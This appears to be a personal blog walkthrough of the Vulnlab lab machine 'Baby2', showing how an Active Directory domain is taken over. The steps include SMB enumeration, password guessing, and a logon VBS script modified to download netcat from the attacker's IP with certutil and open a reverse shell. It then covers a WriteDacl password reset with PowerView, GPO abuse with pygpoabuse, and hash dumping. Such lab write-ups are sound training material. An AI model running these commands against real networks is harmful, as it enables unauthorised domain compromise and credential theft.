Persecure : my learning archive

Baby2

Baby2, crafted by xct and & r0BIT in Vulnlab, is an active directory machine designed to investigate misconfigurations in logon scripts and exploit GPO vulnerabilities.

Enumeration

Start a nmap scan to look for open ports and add the necessary flags for in depth enumeration.

From the scan we can take note of the domain name (baby2.vl) and start the process of null enumeration.

There is a null SMB share available for us to investigate.

Use the spider_plus module in crackmapexec to get a list of files to view.

netexec smb 10.10.103.3 -u 'null' -p '' -M spider_plus

From the CHANGELOG file we notice some clues of a script.

There is lnk file that leads to the script. In the lnk file we notice that there is script in the SYSVOL folder.

Looking through the other shared folders, we come across a potential list of usernames in the home share folder.

If there are no password clues available, the next best thing is to use the username as passwords.

We are able to find two users, let’s start with the necessary enumeration or looking for access such as winrm, lDAP, RDP and SMB.

We are able to see that the user carl.moore is able to read the sysvol folder. Which is where we saw earlier is linking too.

Initial Foothold

Using smbclient the current user is able to gain access to the particular script folder.

Download the login.vbs script and edit the script to add a reverse shell. 

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c mkdir C:\Temp"
oShell.run "cmd.exe /c certutil -urlcache -f http://10.8.1.176:8888/nc.exe C:\Temp\nc.exe"
oShell.run "cmd.exe /c C:\Temp\nc.exe 10.8.1.176 443 -e cmd.exe"

This additional script will first create a temp directory and then download netcat through our python server and execute the netcat command to connect a reverse shell.

Place this newly modified script into the script folder and wait for the login script to be executed.

After some time, we have a shell.

Privilege Escalation

Use bloodhound to get a clear overview of the network.

In the amelia.griffith user we noticed there is a longonscript. Hence if you leave your python server you would see it consistently downloading netcat based on the modified script.

We can also see the user is able to RDP.

Looking through the specific node we notice that AMELIA.GRIFFITH belongs to the legacy group which has WriteDacl permissions to GPOADM.

WriteDacl – BloodHound (bloodhoundenterprise.io)

First let’s bring in PowerView to our victim machine. 

certutil -urlcache -f http://10.8.1.176:8888/powerview.ps1 powerview.ps1

powershell -ep bypass

import-module .\powerview.ps1

Then input the following to change the password of the gpoadm user.

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"
$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
set-domainuserpassword gpoadm -accountpassword $cred

Use CME to check if password has been changed.

Utilizing bloodhound again we notice that the GPOADM user has GenericAll over the default domain controller’s policy.

GenericAll – BloodHound (bloodhoundenterprise.io)

First, we need to find the GPO File Path ID in the policy.

We can use pygpoabuse.py to add the gpoadm user into the administrator group. 

python3.9 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.89.216 -command 'net localgroup administrators /add gpoadm'

Once the abuse is done the gpoadm user will be an admin.

Use secretsdump to dump out the hashes.

Use the administrator hash to winrm as admin.

Create a website or blog at WordPress.com